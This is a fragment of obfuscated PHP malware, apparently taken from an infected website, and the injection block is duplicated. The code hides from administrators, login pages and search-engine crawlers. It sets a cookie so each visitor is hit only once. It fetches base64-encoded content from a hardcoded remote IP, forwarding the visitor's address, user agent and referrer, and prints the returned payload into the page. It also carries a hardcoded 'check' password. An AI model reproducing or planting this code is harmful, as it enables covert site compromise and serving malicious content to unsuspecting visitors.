in\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) { if (preg_match($regex, $_SERVER['REQUEST_URI'])) { $bad_url = true; break; } } $cookie_name = '_PHP_SESSION_PHP'; if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) { setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/'); $url = base64_decode("aHR0cDovLzEwOC42MS4xMTcuMjQ0L2Jsb2cvP3ZlbnVzJnV0bV9zb3VyY2U9MTgyNzI6MjcxOTg5OjQ2OA=="); $code = request_url_data($url); // if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) { $echo_done = true; print $decoded; } }//iend //istart function request_url_data($url) { $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"], 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"], 'Referer: ' . $site_url, )); $response = trim(curl_exec($ch)); } elseif (function_exists('fsockopen')) { $m = parse_url($url); if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) { fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" . 'Host: ' . $m['host'] . "\r\n" . 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" . 'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" . 'Referer: ' . $site_url . "\r\n" . 'Connection: Close' . "\r\n\r\n"); $response = ''; while (!feof($fp)) { $response .= fgets($fp, 1024); } list($headers, $response) = explode("\r\n\r\n", $response); fclose($fp); } } else { $response = 'curl_init and fsockopen disabled'; } return $response; } error_reporting(0); $_passssword = "6f203588e25163ed8d65c32d7911d5fb"; if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) { echo(''); } unset($_passssword); $bad_url = false; foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) { if (preg_match($regex, $_SERVER['REQUEST_URI'])) { $bad_url = true; break; } } $cookie_name = '_PHP_SESSION_PHP'; if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) { setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/'); $url = base64_decode("aHR0cDovLzEwOC42MS4xMTcuMjQ0L2Jsb2cvP3ZlbnVzJnV0bV9zb3VyY2U9MzA5NDU6MjY4NDI2OjQ2OA=="); $code = request_url_data($url); // if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) { $echo_done = true; print $decoded; } }//iend No configuration file found and no installation code available. Exiting...